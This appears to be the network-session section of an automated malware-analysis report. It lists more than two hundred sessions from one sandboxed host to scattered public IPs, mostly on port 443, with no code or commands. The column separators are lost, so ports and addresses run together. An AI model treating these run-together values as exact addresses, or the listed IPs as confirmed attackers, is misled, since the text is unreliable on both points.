                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22607192.168.2.234083680.217.51.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22608192.168.2.2358516167.207.133.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22609192.168.2.2359438209.44.224.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22610192.168.2.2336808152.161.251.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22611192.168.2.235558458.87.37.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22612192.168.2.2337984155.151.151.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22613192.168.2.234699499.109.206.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22614192.168.2.2352206115.237.13.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22615192.168.2.2358252190.202.140.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22616192.168.2.234511071.241.86.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22617192.168.2.234478493.44.253.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22618192.168.2.233980889.188.108.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22619192.168.2.2338636189.25.36.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22620192.168.2.2360802197.195.55.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22621192.168.2.235350453.19.242.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22622192.168.2.234214437.69.189.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22623192.168.2.2344776135.92.5.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22624192.168.2.234985878.133.110.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22625192.168.2.233955850.233.47.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22626192.168.2.234040678.133.105.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22627192.168.2.2347456209.209.119.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22628192.168.2.2359770119.86.115.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22629192.168.2.235826435.247.69.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22630192.168.2.2335280167.2.150.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22631192.168.2.2348228168.77.237.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22632192.168.2.2336222167.101.85.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22633192.168.2.233408471.251.27.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22634192.168.2.2352642185.199.91.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22635192.168.2.235374840.97.227.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22636192.168.2.2355688195.59.39.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22637192.168.2.234825661.60.108.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22638192.168.2.234102418.179.0.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22639192.168.2.2346350210.100.57.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22640192.168.2.2356634217.3.117.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22641192.168.2.2351604124.162.94.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22642192.168.2.234978892.221.251.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22643192.168.2.2345706223.169.9.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22644192.168.2.2360132132.19.215.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22645192.168.2.233442231.183.56.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22646192.168.2.2356740177.169.206.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22647192.168.2.233369249.166.72.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22648192.168.2.2334760201.220.164.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22649192.168.2.2344396190.238.95.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22650192.168.2.235749053.142.241.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22651192.168.2.2354178109.61.12.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22652192.168.2.235895217.80.16.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22653192.168.2.2345748211.226.24.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22654192.168.2.2341536130.171.32.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22655192.168.2.2336350207.17.28.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22656192.168.2.234649031.219.201.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22657192.168.2.2346386120.8.237.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22658192.168.2.233587452.183.176.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22659192.168.2.2360032152.100.6.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22660192.168.2.235342459.66.18.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22661192.168.2.2338464172.238.129.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22662192.168.2.234407873.170.8.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22663192.168.2.2347848174.85.94.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22664192.168.2.2350330180.80.186.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22665192.168.2.2360626200.70.234.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22666192.168.2.234855488.236.201.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22667192.168.2.233311043.223.251.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22668192.168.2.233659825.134.122.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22669192.168.2.2338840175.137.115.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22670192.168.2.234723887.110.198.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22671192.168.2.2336086217.165.226.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22672192.168.2.2339458199.63.169.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22673192.168.2.234684876.143.94.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22674192.168.2.233782273.181.153.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22675192.168.2.2343660185.150.198.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22676192.168.2.2349954138.8.114.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22677192.168.2.234113467.17.33.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22678192.168.2.2340516135.82.144.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22679192.168.2.2336080222.148.63.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22680192.168.2.2347340122.19.195.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22681192.168.2.2341088181.86.83.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22682192.168.2.2354002181.11.207.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22683192.168.2.2350092188.213.98.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22684192.168.2.234671034.165.37.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22685192.168.2.2350784139.137.63.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22686192.168.2.2341204114.129.162.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22687192.168.2.2341698152.247.29.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22688192.168.2.23558488.146.71.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22689192.168.2.233700675.82.162.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22690192.168.2.235019846.31.132.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22691192.168.2.234734466.107.100.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22692192.168.2.2346088117.141.55.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22693192.168.2.2351186218.95.76.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22694192.168.2.235975467.82.252.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22695192.168.2.2349598188.132.219.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22696192.168.2.2348534156.26.239.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22697192.168.2.233416280.158.95.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22698192.168.2.235578619.23.137.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22699192.168.2.2339936142.231.73.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22700192.168.2.235283687.142.231.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22701192.168.2.235409420.53.1.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22702192.168.2.2337494147.165.177.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22703192.168.2.2334068154.26.26.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22704192.168.2.2354194183.164.56.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22705192.168.2.234377858.21.187.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22706192.168.2.2342982190.40.166.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22707192.168.2.235385659.183.57.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22708192.168.2.2337270147.72.236.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22709192.168.2.2337680155.25.0.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22710192.168.2.2357172167.141.157.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22711192.168.2.234532885.116.90.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22712192.168.2.2343166195.160.173.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22713192.168.2.2338342105.145.132.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22714192.168.2.2334744104.201.2.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22715192.168.2.2342738125.19.226.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22716192.168.2.2354720140.141.245.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22717192.168.2.2348380156.6.208.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22718192.168.2.2360100180.112.250.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22719192.168.2.2355668119.49.204.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22720192.168.2.233977237.189.95.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22721192.168.2.2358654208.137.253.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22722192.168.2.235032876.152.126.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22723192.168.2.233434465.246.111.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22724192.168.2.235122439.16.164.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22725192.168.2.234281652.36.217.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22726192.168.2.2357562208.203.190.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22727192.168.2.2356120106.169.215.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22728192.168.2.234727072.130.57.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22729192.168.2.234992889.141.6.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22730192.168.2.2339942141.136.25.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22731192.168.2.2352878189.94.196.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22732192.168.2.235661449.8.206.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22733192.168.2.234080240.126.168.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22734192.168.2.234354840.102.34.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22735192.168.2.233566272.94.199.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22736192.168.2.2351844121.177.101.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22737192.168.2.2359608160.108.45.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22738192.168.2.2355168140.28.204.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22739192.168.2.233364241.226.109.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22740192.168.2.2338172152.109.35.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22741192.168.2.234906675.128.194.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22742192.168.2.2335536196.32.76.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22743192.168.2.2352462183.111.196.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22744192.168.2.2349504100.222.193.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22745192.168.2.234693225.169.79.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22746192.168.2.2353290213.53.20.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22747192.168.2.235657499.126.208.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22748192.168.2.234136462.184.246.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22749192.168.2.2340366121.184.123.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22750192.168.2.234364854.117.145.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22751192.168.2.233969823.144.60.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22752192.168.2.235075462.188.236.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22753192.168.2.2357060164.108.218.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22754192.168.2.235381274.34.118.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22755192.168.2.2333828173.41.186.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22756192.168.2.2338806130.202.174.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22757192.168.2.2346858153.20.222.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22758192.168.2.234846296.75.230.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22759192.168.2.233567080.226.58.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22760192.168.2.2357812216.56.207.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22761192.168.2.2359154221.200.186.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22762192.168.2.233788653.13.164.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22763192.168.2.2341308148.105.249.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22764192.168.2.2357452138.77.155.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22765192.168.2.2349264184.222.155.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22766192.168.2.2352438180.227.102.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22767192.168.2.2360706170.7.27.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22768192.168.2.2338746211.244.115.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22769192.168.2.23394988.74.20.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22770192.168.2.233449649.217.253.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22771192.168.2.2351912134.63.114.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22772192.168.2.2333522197.12.179.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22773192.168.2.2342066196.252.75.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22774192.168.2.2352942183.48.133.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22775192.168.2.235065682.204.10.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22776192.168.2.235046225.72.253.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22777192.168.2.2350180171.85.14.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22778192.168.2.2345152150.237.7.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22779192.168.2.2341398199.123.114.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22780192.168.2.235888092.38.97.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22781192.168.2.233703091.80.174.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22782192.168.2.2336228150.212.201.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22783192.168.2.234913249.163.39.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22784192.168.2.23332601.234.127.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22785192.168.2.236042052.45.89.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22786192.168.2.2344362175.11.122.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22787192.168.2.2347544190.229.216.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22788192.168.2.233455876.30.236.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22789192.168.2.234492296.153.78.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22790192.168.2.2334922104.0.164.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22791192.168.2.234538058.78.251.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22792192.168.2.2336524100.29.181.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22793192.168.2.2334754190.80.88.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22794192.168.2.2358494209.83.119.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22795192.168.2.2341506149.91.248.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22796192.168.2.2336840107.79.100.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22797192.168.2.234207019.181.21.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22798192.168.2.2341844129.157.164.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22799192.168.2.2359204217.180.133.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22800192.168.2.234832094.120.226.528080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22801192.168.2.2347900175.226.92.578080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22802192.168.2.235217095.150.6.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22803192.168.2.2350408155.144.147.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22804192.168.2.2349222213.109.187.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22805192.168.2.235902038.128.168.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22806192.168.2.235932653.218.215.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22807192.168.2.233393466.148.189.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22808192.168.2.2334756183.98.28.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22809192.168.2.2342054110.48.6.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22810192.168.2.2340190109.56.91.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22811192.168.2.2356082193.38.183.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22812192.168.2.2344524223.147.103.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22813192.168.2.235740453.234.68.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22814192.168.2.235316040.162.106.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22815192.168.2.234420892.166.143.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22816192.168.2.234965449.124.36.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22817192.168.2.235194296.179.221.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22818192.168.2.2357306153.137.216.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22819192.168.2.2355610146.223.144.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22820192.168.2.2356992101.177.17.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22821192.168.2.2356626185.162.21.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22822192.168.2.2348076169.180.140.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22823192.168.2.2358720122.78.157.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22824192.168.2.234930683.213.225.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22825192.168.2.2346750107.126.110.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22826192.168.2.2350380146.117.245.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22827192.168.2.234066649.115.125.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
